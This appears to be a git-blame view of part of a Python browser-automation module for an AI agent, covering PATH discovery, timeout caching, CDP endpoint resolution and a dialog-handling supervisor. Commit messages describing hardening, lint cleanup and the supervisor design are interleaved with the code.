2026-03-23 22:45:55 -07:00
try :
for entry in os . listdir ( homebrew_opt ) :
if entry . startswith ( " node " ) and entry != " node " :
bin_dir = os . path . join ( homebrew_opt , entry , " bin " )
if os . path . isdir ( bin_dir ) :
dirs . append ( bin_dir )
except OSError :
pass
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
return tuple ( dirs )
2026-03-14 02:56:06 -07:00
2026-04-14 16:47:36 -07:00
def _browser_candidate_path_dirs ( ) - > list [ str ] :
""" Return ordered browser CLI PATH candidates shared by discovery and execution. """
hermes_home = get_hermes_home ( )
hermes_node_bin = str ( hermes_home / " node " / " bin " )
return [ hermes_node_bin , * list ( _discover_homebrew_node_dirs ( ) ) , * _SANE_PATH_DIRS ]
def _merge_browser_path ( existing_path : str = " " ) - > str :
""" Prepend browser-specific PATH fallbacks without reordering existing entries. """
path_parts = [ p for p in ( existing_path or " " ) . split ( os . pathsep ) if p ]
existing_parts = set ( path_parts )
prefix_parts : list [ str ] = [ ]
for part in _browser_candidate_path_dirs ( ) :
if not part or part in existing_parts or part in prefix_parts :
continue
if os . path . isdir ( part ) :
prefix_parts . append ( part )
return os . pathsep . join ( prefix_parts + path_parts )
2026-03-14 02:56:06 -07:00
# Throttle screenshot cleanup to avoid repeated full directory scans.
_last_screenshot_cleanup_by_dir : dict [ str , float ] = { }
2026-01-29 06:10:24 +00:00
# ============================================================================
# Configuration
# ============================================================================
# Default timeout for browser commands (seconds)
DEFAULT_COMMAND_TIMEOUT = 30
# Max tokens for snapshot content before summarization
SNAPSHOT_SUMMARIZE_THRESHOLD = 8000
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
# Commands that legitimately return empty stdout (e.g. close, record).
_EMPTY_OK_COMMANDS : frozenset = frozenset ( { " close " , " record " } )
_cached_command_timeout : Optional [ int ] = None
_command_timeout_resolved = False
2026-03-07 08:52:06 -08:00
2026-03-24 07:21:50 -07:00
def _get_command_timeout ( ) - > int :
""" Return the configured browser command timeout from config.yaml.
Reads ` ` config [ " browser " ] [ " command_timeout " ] ` ` and falls back to
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
` ` DEFAULT_COMMAND_TIMEOUT ` ` ( 30 s ) if unset or unreadable . Result is
cached after the first call and cleared by ` ` cleanup_all_browsers ( ) ` ` .
2026-03-24 07:21:50 -07:00
"""
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
global _cached_command_timeout , _command_timeout_resolved
if _command_timeout_resolved :
return _cached_command_timeout # type: ignore[return-value]
_command_timeout_resolved = True
result = DEFAULT_COMMAND_TIMEOUT
2026-03-24 07:21:50 -07:00
try :
2026-04-07 17:28:04 -07:00
from hermes_cli . config import read_raw_config
cfg = read_raw_config ( )
val = cfg . get ( " browser " , { } ) . get ( " command_timeout " )
if val is not None :
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
result = max ( int ( val ) , 5 ) # Floor at 5s to avoid instant kills
2026-03-24 07:21:50 -07:00
except Exception as e :
logger . debug ( " Could not read command_timeout from config: %s " , e )
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
_cached_command_timeout = result
return result
2026-03-24 07:21:50 -07:00
2026-03-11 20:52:19 -07:00
def _get_vision_model ( ) - > Optional [ str ] :
2026-03-07 08:52:06 -08:00
""" Model for browser_vision (screenshot analysis — multimodal). """
2026-03-11 20:52:19 -07:00
return os . getenv ( " AUXILIARY_VISION_MODEL " , " " ) . strip ( ) or None
2026-03-07 08:52:06 -08:00
2026-03-11 20:52:19 -07:00
def _get_extraction_model ( ) - > Optional [ str ] :
2026-03-07 08:52:06 -08:00
""" Model for page snapshot text summarization — same as web_extract. """
2026-03-11 20:52:19 -07:00
return os . getenv ( " AUXILIARY_WEB_EXTRACT_MODEL " , " " ) . strip ( ) or None
2026-01-29 06:10:24 +00:00
2026-03-07 01:14:57 -08:00
2026-03-19 14:06:49 +00:00
def _resolve_cdp_override ( cdp_url : str ) - > str :
""" Normalize a user-supplied CDP endpoint into a concrete connectable URL.
Accepts :
- full websocket endpoints : ws : / / host : port / devtools / browser / . . .
- HTTP discovery endpoints : http : / / host : port or http : / / host : port / json / version
- bare websocket host : port values like ws : / / host : port
For discovery - style endpoints we fetch / json / version and return the
webSocketDebuggerUrl so downstream tools always receive a concrete browser
websocket instead of an ambiguous host : port URL .
"""
raw = ( cdp_url or " " ) . strip ( )
if not raw :
return " "
lowered = raw . lower ( )
if " /devtools/browser/ " in lowered :
return raw
discovery_url = raw
refactor: codebase-wide lint cleanup — unused imports, dead code, and inefficient patterns (#5821)
Comprehensive cleanup across 80 files based on automated (ruff, pyflakes, vulture)
and manual analysis of the entire codebase.
Changes by category:
Unused imports removed (~95 across 55 files):
- Removed genuinely unused imports from all major subsystems
- agent/, hermes_cli/, tools/, gateway/, plugins/, cron/
- Includes imports in try/except blocks that were truly unused
(vs availability checks which were left alone)
Unused variables removed (~25):
- Removed dead variables: connected, inner, channels, last_exc,
source, new_server_names, verify, pconfig, default_terminal,
result, pending_handled, temperature, loop
- Dropped unused argparse subparser assignments in hermes_cli/main.py
(12 instances of add_parser() where result was never used)
Dead code removed:
- run_agent.py: Removed dead ternary (None if False else None) and
surrounding unreachable branch in identity fallback
- run_agent.py: Removed write-only attribute _last_reported_tool
- hermes_cli/providers.py: Removed dead @property decorator on
module-level function (decorator has no effect outside a class)
- gateway/run.py: Removed unused MCP config load before reconnect
- gateway/platforms/slack.py: Removed dead SessionSource construction
Undefined name bugs fixed (would cause NameError at runtime):
- batch_runner.py: Added missing logger = logging.getLogger(__name__)
- tools/environments/daytona.py: Added missing Dict and Path imports
Unnecessary global statements removed (14):
- tools/terminal_tool.py: 5 functions declared global for dicts
they only mutated via .pop()/[key]=value (no rebinding)
- tools/browser_tool.py: cleanup thread loop only reads flag
- tools/rl_training_tool.py: 4 functions only do dict mutations
- tools/mcp_oauth.py: only reads the global
- hermes_time.py: only reads cached values
Inefficient patterns fixed:
- startswith/endswith tuple form: 15 instances of
x.startswith('a') or x.startswith('b') consolidated to
x.startswith(('a', 'b'))
- len(x)==0 / len(x)>0: 13 instances replaced with pythonic
truthiness checks (not x / bool(x))
- in dict.keys(): 5 instances simplified to in dict
- Redefined unused name: removed duplicate _strip_mdv2 import in
send_message_tool.py
Other fixes:
- hermes_cli/doctor.py: Replaced undefined logger.debug() with pass
- hermes_cli/config.py: Consolidated chained .endswith() calls
Test results: 3934 passed, 17 failed (all pre-existing on main),
19 skipped. Zero regressions.
2026-04-07 10:25:31 -07:00
if lowered . startswith ( ( " ws:// " , " wss:// " ) ) :
2026-03-19 14:06:49 +00:00
if raw . count ( " : " ) == 2 and raw . rstrip ( " / " ) . rsplit ( " : " , 1 ) [ - 1 ] . isdigit ( ) and " / " not in raw . split ( " : " , 2 ) [ - 1 ] :
discovery_url = ( " http:// " if lowered . startswith ( " ws:// " ) else " https:// " ) + raw . split ( " :// " , 1 ) [ 1 ]
else :
return raw
if discovery_url . lower ( ) . endswith ( " /json/version " ) :
version_url = discovery_url
else :
version_url = discovery_url . rstrip ( " / " ) + " /json/version "
try :
response = requests . get ( version_url , timeout = 10 )
response . raise_for_status ( )
payload = response . json ( )
except Exception as exc :
logger . warning ( " Failed to resolve CDP endpoint %s via %s : %s " , raw , version_url , exc )
return raw
ws_url = str ( payload . get ( " webSocketDebuggerUrl " ) or " " ) . strip ( )
if ws_url :
logger . info ( " Resolved CDP endpoint %s -> %s " , raw , ws_url )
return ws_url
logger . warning ( " CDP discovery at %s did not return webSocketDebuggerUrl; using raw endpoint " , version_url )
return raw
2026-03-16 06:38:20 -07:00
def _get_cdp_override ( ) - > str :
2026-04-17 15:03:31 -06:00
""" Return a normalized CDP URL override, or empty string.
2026-03-16 06:38:20 -07:00
2026-04-17 15:03:31 -06:00
Precedence is :
1. ` ` BROWSER_CDP_URL ` ` env var ( live override from ` ` / browser connect ` ` )
2. ` ` browser . cdp_url ` ` in config . yaml ( persistent config )
When either is set , we skip both Browserbase and the local headless
launcher and connect directly to the supplied Chrome DevTools Protocol
endpoint .
2026-03-16 06:38:20 -07:00
"""
2026-04-17 15:03:31 -06:00
env_override = os . environ . get ( " BROWSER_CDP_URL " , " " ) . strip ( )
if env_override :
return _resolve_cdp_override ( env_override )
try :
from hermes_cli . config import read_raw_config
cfg = read_raw_config ( )
browser_cfg = cfg . get ( " browser " , { } )
if isinstance ( browser_cfg , dict ) :
return _resolve_cdp_override ( str ( browser_cfg . get ( " cdp_url " , " " ) or " " ) )
except Exception as e :
logger . debug ( " Could not read browser.cdp_url from config: %s " , e )
return " "
2026-03-16 06:38:20 -07:00
feat(browser): CDP supervisor — dialog detection + response + cross-origin iframe eval (#14540)
* docs: browser CDP supervisor design (for upcoming PR)
Design doc ahead of implementation — dialog + iframe detection/interaction
via a persistent CDP supervisor. Covers backend capability matrix (verified
live 2026-04-23), architecture, lifecycle, policy, agent surface, PR split,
non-goals, and test plan.
Supersedes #12550.
No code changes in this commit.
* feat(browser): add persistent CDP supervisor for dialog + frame detection
Single persistent CDP WebSocket per Hermes task_id that subscribes to
Page/Runtime/Target events and maintains thread-safe state for pending
dialogs, frame tree, and console errors.
Supervisor lives in its own daemon thread running an asyncio loop;
external callers use sync API (snapshot(), respond_to_dialog()) that
bridges onto the loop.
Auto-attaches to OOPIF child targets via Target.setAutoAttach{flatten:true}
and enables Page+Runtime on each so iframe-origin dialogs surface through
the same supervisor.
Dialog policies: must_respond (default, 300s safety timeout),
auto_dismiss, auto_accept.
Frame tree capped at 30 entries + OOPIF depth 2 to keep snapshot
payloads bounded on ad-heavy pages.
E2E verified against real Chrome via smoke test — detects + responds
to main-frame alerts, iframe-contentWindow alerts, preserves frame
tree, graceful no-dialog error path, clean shutdown.
No agent-facing tool wiring in this commit (comes next).
* feat(browser): add browser_dialog tool wired to CDP supervisor
Agent-facing response-only tool. Schema:
action: 'accept' | 'dismiss' (required)
prompt_text: response for prompt() dialogs (optional)
dialog_id: disambiguate when multiple dialogs queued (optional)
Handler:
SUPERVISOR_REGISTRY.get(task_id).respond_to_dialog(...)
check_fn shares _browser_cdp_check with browser_cdp so both surface and
hide together. When no supervisor is attached (Camofox, default
Playwright, or no browser session started yet), tool is hidden; if
somehow invoked it returns a clear error pointing the agent to
browser_navigate / /browser connect.
Registered in _HERMES_CORE_TOOLS and the browser / hermes-acp /
hermes-api-server toolsets alongside browser_cdp.
* feat(browser): wire CDP supervisor into session lifecycle + browser_snapshot
Supervisor lifecycle:
* _get_session_info lazy-starts the supervisor after a session row is
materialized — covers every backend code path (Browserbase, cdp_url
override, /browser connect, future providers) with one hook.
* cleanup_browser(task_id) stops the supervisor for that task first
(before the backend tears down CDP).
* cleanup_all_browsers() calls SUPERVISOR_REGISTRY.stop_all().
* /browser connect eagerly starts the supervisor for task 'default'
so the first snapshot already shows pending_dialogs.
* /browser disconnect stops the supervisor.
CDP URL resolution for the supervisor:
1. BROWSER_CDP_URL / browser.cdp_url override.
2. Fallback: session_info['cdp_url'] from cloud providers (Browserbase).
browser_snapshot merges supervisor state (pending_dialogs + frame_tree)
into its JSON output when a supervisor is active — the agent reads
pending_dialogs from the snapshot it already requests, then calls
browser_dialog to respond. No extra tool surface.
Config defaults:
* browser.dialog_policy: 'must_respond' (new)
* browser.dialog_timeout_s: 300 (new)
No version bump — new keys deep-merge into existing browser section.
Deadlock fix in supervisor event dispatch:
* _on_dialog_opening and _on_target_attached used to await CDP calls
while the reader was still processing an event — but only the reader
can set the response Future, so the call timed out.
* Both now fire asyncio.create_task(...) so the reader stays pumping.
* auto_dismiss/auto_accept now actually close the dialog immediately.
Tests (tests/tools/test_browser_supervisor.py, 11 tests, real Chrome):
* supervisor start/snapshot
* main-frame alert detection + dismiss
* iframe.contentWindow alert
* prompt() with prompt_text reply
* respond with no pending dialog -> clean error
* auto_dismiss clears on event
* registry idempotency
* registry stop -> snapshot reports inactive
* browser_dialog tool no-supervisor error
* browser_dialog invalid action
* browser_dialog end-to-end via tool handler
xdist-safe: chrome_cdp fixture uses a per-worker port.
Skipped when google-chrome/chromium isn't installed.
* docs(browser): document browser_dialog tool + CDP supervisor
- user-guide/features/browser.md: new browser_dialog section with
workflow, availability gate, and dialog_policy table
- reference/tools-reference.md: row for browser_dialog, tool count
bumped 53 -> 54, browser tools count 11 -> 12
- reference/toolsets-reference.md: browser_dialog added to browser
toolset row with note on pending_dialogs / frame_tree snapshot fields
Full design doc lives at
developer-guide/browser-supervisor.md (committed earlier).
* fix(browser): reconnect loop + recent_dialogs for Browserbase visibility
Found via Browserbase E2E test that revealed two production-critical issues:
1. **Supervisor WebSocket drops when other clients disconnect.** Browserbase's
CDP proxy tears down our long-lived WebSocket whenever a short-lived
client (e.g. agent-browser CLI's per-command CDP connection) disconnects.
Fixed with a reconnecting _run loop that re-attaches with exponential
backoff on drops. _page_session_id and _child_sessions are reset on each
reconnect; pending_dialogs and frames are preserved across reconnects.
2. **Browserbase auto-dismisses dialogs server-side within ~10ms.** Their
Playwright-based CDP proxy dismisses alert/confirm/prompt before our
Page.handleJavaScriptDialog call can respond. So pending_dialogs is
empty by the time the agent reads a snapshot on Browserbase.
Added a recent_dialogs ring buffer (capacity 20) that retains a
DialogRecord for every dialog that opened, with a closed_by tag:
* 'agent' — agent called browser_dialog
* 'auto_policy' — local auto_dismiss/auto_accept fired
* 'watchdog' — must_respond timeout auto-dismissed (300s default)
* 'remote' — browser/backend closed it on us (Browserbase)
Agents on Browserbase now see the dialog history with closed_by='remote'
so they at least know a dialog fired, even though they couldn't respond.
3. **Page.javascriptDialogClosed matching bug.** The event doesn't include a
'message' field (CDP spec has only 'result' and 'userInput') but our
_on_dialog_closed was matching on message. Fixed to match by session_id
+ oldest-first, with a safety assumption that only one dialog is in
flight per session (the JS thread is blocked while a dialog is up).
Docs + tests updated:
* browser.md: new availability matrix showing the three backends and
which mode (pending / recent / response) each supports
* developer-guide/browser-supervisor.md: three-field snapshot schema
with closed_by semantics
* test_browser_supervisor.py: +test_recent_dialogs_ring_buffer (12/12
passing against real Chrome)
E2E verified both backends:
* Local Chrome via /browser connect: detect + respond full workflow
(smoke_supervisor.py all 7 scenarios pass)
* Browserbase: detect via recent_dialogs with closed_by='remote'
(smoke_supervisor_browserbase_v2.py passes)
Camofox remains out of scope (REST-only, no CDP) — tracked for
upstream PR 3.
* feat(browser): XHR bridge for dialog response on Browserbase (FIXED)
Browserbase's CDP proxy auto-dismisses native JS dialogs within ~10ms, so
Page.handleJavaScriptDialog calls lose the race. Solution: bypass native
dialogs entirely.
The supervisor now injects Page.addScriptToEvaluateOnNewDocument with a
JavaScript override for window.alert/confirm/prompt. Those overrides
perform a synchronous XMLHttpRequest to a magic host
('hermes-dialog-bridge.invalid'). We intercept those XHRs via Fetch.enable
with a requestStage=Request pattern.
Flow when a page calls alert('hi'):
1. window.alert override intercepts, builds XHR GET to
http://hermes-dialog-bridge.invalid/?kind=alert&message=hi
2. Sync XHR blocks the page's JS thread (mirrors real dialog semantics)
3. Fetch.requestPaused fires on our WebSocket; supervisor surfaces
it as a pending dialog with bridge_request_id set
4. Agent reads pending_dialogs from browser_snapshot, calls browser_dialog
5. Supervisor calls Fetch.fulfillRequest with JSON body:
{accept: true|false, prompt_text: '...', dialog_id: 'd-N'}
6. The injected script parses the body, returns the appropriate value
from the override (undefined for alert, bool for confirm, string|null
for prompt)
This works identically on Browserbase AND local Chrome — no native dialog
ever fires, so Browserbase's auto-dismiss has nothing to race. Dialog
policies (must_respond / auto_dismiss / auto_accept) all still work.
Bridge is installed on every attached session (main page + OOPIF child
sessions) so iframe dialogs are captured too.
Native-dialog path kept as a fallback for backends that don't auto-dismiss
(so a page that somehow bypasses our override — e.g. iframes that load
after Fetch.enable but before the init-script runs — still gets observed
via Page.javascriptDialogOpening).
E2E VERIFIED:
* Local Chrome: 13/13 pytest tests green (12 original + new
test_bridge_captures_prompt_and_returns_reply_text that asserts
window.__ret === 'AGENT-SUPPLIED-REPLY' after agent responds)
* Browserbase: smoke_bb_bridge_v2.py runs 4/4 PASS:
- alert('BB-ALERT-MSG') dismiss → page.alert_ret = undefined ✓
- prompt('BB-PROMPT-MSG', 'default-xyz') accept with 'AGENT-REPLY'
→ page.prompt_ret === 'AGENT-REPLY' ✓
- confirm('BB-CONFIRM-MSG') accept → page.confirm_ret === true ✓
- confirm('BB-CONFIRM-MSG') dismiss → page.confirm_ret === false ✓
Docs updated in browser.md and developer-guide/browser-supervisor.md —
availability matrix now shows Browserbase at full parity with local
Chrome for both detection and response.
* feat(browser): cross-origin iframe interaction via browser_cdp(frame_id=...)
Adds iframe interaction to the CDP supervisor PR (was queued as PR 2).
Design: browser_cdp gets an optional frame_id parameter. When set, the
tool looks up the frame in the supervisor's frame_tree, grabs its child
cdp_session_id (OOPIF session), and dispatches the CDP call through the
supervisor's already-connected WebSocket via run_coroutine_threadsafe.
Why not stateless: on Browserbase, each fresh browser_cdp WebSocket
must re-negotiate against a signed connectUrl. The session info carries
a specific URL that can expire while the supervisor's long-lived
connection stays valid. Routing via the supervisor sidesteps this.
Agent workflow:
1. browser_snapshot → frame_tree.children[] shows OOPIFs with is_oopif=true
2. browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF frame_id>,
params={'expression': 'document.title', 'returnByValue': True})
3. Supervisor dispatches the call on the OOPIF's child session
Supervisor state fixes needed along the way:
* _on_frame_detached now skips reason='swap' (frame migrating processes)
* _on_frame_detached also skips when the frame is an OOPIF with a live
child session — Browserbase fires spurious remove events when a
same-origin iframe gets promoted to OOPIF
* _on_target_detached clears cdp_session_id but KEEPS the frame record
so the agent still sees the OOPIF in frame_tree during transient
session flaps
E2E VERIFIED on Browserbase (smoke_bb_iframe_agent_path.py):
browser_cdp(method='Runtime.evaluate',
params={'expression': 'document.title', 'returnByValue': True},
frame_id=<OOPIF>)
→ {'success': True, 'result': {'value': 'Example Domain'}}
The iframe is <iframe src='https://example.com/'> inside a top-level
data: URL page on a real Browserbase session. The agent Runtime.evaluates
INSIDE the cross-origin iframe and gets example.com's title back.
Tests (tests/tools/test_browser_supervisor.py — 16 pass total):
* test_browser_cdp_frame_id_routes_via_supervisor — injects fake OOPIF,
verifies routing via supervisor, Runtime.evaluate returns 1+1=2
* test_browser_cdp_frame_id_missing_supervisor — clean error when no
supervisor attached
* test_browser_cdp_frame_id_not_in_frame_tree — clean error on bad
frame_id
Docs (browser.md and developer-guide/browser-supervisor.md) updated with
the iframe workflow, availability matrix now shows OOPIF eval as shipped
for local Chrome + Browserbase.
* test(browser): real-OOPIF E2E verified manually + chrome_cdp uses --site-per-process
When asked 'did you test the iframe stuff' I had only done a mocked
pytest (fake injected OOPIF) plus a Browserbase E2E. Closed the
local-Chrome real-OOPIF gap by writing /tmp/dialog-iframe-test/
smoke_local_oopif.py:
* 2 http servers on different hostnames (localhost:18905 + 127.0.0.1:18906)
* Chrome with --site-per-process so the cross-origin iframe becomes a
real OOPIF in its own process
* Navigate, find OOPIF in supervisor.frame_tree, call
browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF>) which routes
through the supervisor's child session
* Asserts iframe document.title === 'INNER-FRAME-XYZ' (from the
inner page, retrieved via OOPIF eval)
PASSED on 2026-04-23.
Tried to embed this as a pytest but hit an asyncio version quirk between
venv (3.11) and the system python (3.13) — Page.navigate hangs in the
pytest harness but works in standalone. Left a self-documenting skip
test that points to the smoke script + describes the verification.
chrome_cdp fixture now passes --site-per-process so future iframe tests
can rely on OOPIF behavior.
Result: 16 pass + 1 documented-skip = 17 tests in
tests/tools/test_browser_supervisor.py.
* docs(browser): add dialog_policy + dialog_timeout_s to configuration.md, fix tool count
Pre-merge docs audit revealed two gaps:
1. user-guide/configuration.md browser config example was missing the
two new dialog_* knobs. Added with a short table explaining
must_respond / auto_dismiss / auto_accept semantics and a link to
the feature page for the full workflow.
2. reference/tools-reference.md header said '54 built-in tools' — real
count on main is 54, this branch adds browser_dialog so it's 55.
Fixed the header. (browser count was already correctly bumped
11 -> 12 in the earlier docs commit.)
No code changes.
2026-04-23 22:23:37 -07:00
def _get_dialog_policy_config ( ) - > Tuple [ str , float ] :
""" Read ``browser.dialog_policy`` + ``browser.dialog_timeout_s`` from config.
Returns a ` ` ( policy , timeout_s ) ` ` tuple , falling back to the supervisor ' s
defaults when keys are absent or invalid .
"""
# Defer imports so browser_tool can be imported in minimal environments.
from tools . browser_supervisor import (
DEFAULT_DIALOG_POLICY ,
DEFAULT_DIALOG_TIMEOUT_S ,
_VALID_POLICIES ,
)
try :
from hermes_cli . config import read_raw_config
cfg = read_raw_config ( )
browser_cfg = cfg . get ( " browser " , { } ) if isinstance ( cfg , dict ) else { }
if not isinstance ( browser_cfg , dict ) :
return DEFAULT_DIALOG_POLICY , DEFAULT_DIALOG_TIMEOUT_S
policy = str ( browser_cfg . get ( " dialog_policy " ) or DEFAULT_DIALOG_POLICY )
if policy not in _VALID_POLICIES :
logger . debug ( " Invalid browser.dialog_policy= %r ; using default " , policy )
policy = DEFAULT_DIALOG_POLICY
timeout_raw = browser_cfg . get ( " dialog_timeout_s " )
try :
timeout_s = float ( timeout_raw ) if timeout_raw is not None else DEFAULT_DIALOG_TIMEOUT_S
if timeout_s < = 0 :
timeout_s = DEFAULT_DIALOG_TIMEOUT_S
except ( TypeError , ValueError ) :
timeout_s = DEFAULT_DIALOG_TIMEOUT_S
return policy , timeout_s
except Exception :
return DEFAULT_DIALOG_POLICY , DEFAULT_DIALOG_TIMEOUT_S
def _ensure_cdp_supervisor ( task_id : str ) - > None :
""" Start a CDP supervisor for ``task_id`` if an endpoint is reachable.
Idempotent — delegates to ` ` SupervisorRegistry . get_or_start ` ` which skips
when a supervisor for this ` ` ( task_id , cdp_url ) ` ` already exists and
tears down + restarts on URL change . Safe to call on every
` ` browser_navigate ` ` / ` ` / browser connect ` ` without worrying about
double - attach .
Resolves the CDP URL in this order :
1. ` ` BROWSER_CDP_URL ` ` / ` ` browser . cdp_url ` ` — covers ` ` / browser connect ` `
and config - set overrides .
2. ` ` _active_sessions [ task_id ] [ " cdp_url " ] ` ` — covers Browserbase + any
other cloud provider whose ` ` create_session ` ` returns a raw CDP URL .
Swallows all errors — failing to attach the supervisor must not break
the browser session itself . The agent simply won ' t see
` ` pending_dialogs ` ` / ` ` frame_tree ` ` fields in snapshots .
"""
cdp_url = _get_cdp_override ( )
if not cdp_url :
# Fallback: active session may carry a per-session CDP URL from a
# cloud provider (Browserbase sets this).
with _cleanup_lock :
session_info = _active_sessions . get ( task_id , { } )
maybe = str ( session_info . get ( " cdp_url " ) or " " )
if maybe :
cdp_url = _resolve_cdp_override ( maybe )
if not cdp_url :
return
try :
from tools . browser_supervisor import SUPERVISOR_REGISTRY # type: ignore[import-not-found]
policy , timeout_s = _get_dialog_policy_config ( )
SUPERVISOR_REGISTRY . get_or_start (
task_id = task_id ,
cdp_url = cdp_url ,
dialog_policy = policy ,
dialog_timeout_s = timeout_s ,
)
except Exception as exc :
logger . debug (
" CDP supervisor attach for task= %s failed (non-fatal): %s " ,
task_id ,
exc ,
)
def _stop_cdp_supervisor ( task_id : str ) - > None :
""" Stop the CDP supervisor for ``task_id`` if one exists. No-op otherwise. """
try :
from tools . browser_supervisor import SUPERVISOR_REGISTRY # type: ignore[import-not-found]
SUPERVISOR_REGISTRY . stop ( task_id )
except Exception as exc :
logger . debug ( " CDP supervisor stop for task= %s failed (non-fatal): %s " , task_id , exc )
2026-03-17 00:16:34 -07:00
# ============================================================================
# Cloud Provider Registry
# ============================================================================
_PROVIDER_REGISTRY : Dict [ str , type ] = {
" browserbase " : BrowserbaseProvider ,
" browser-use " : BrowserUseProvider ,
2026-04-06 14:05:26 -07:00
" firecrawl " : FirecrawlProvider ,
2026-03-17 00:16:34 -07:00
}
_cached_cloud_provider : Optional [ CloudBrowserProvider ] = None
_cloud_provider_resolved = False
2026-03-31 11:11:55 +02:00
_allow_private_urls_resolved = False
2026-03-31 03:16:40 -07:00
_cached_allow_private_urls : Optional [ bool ] = None
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
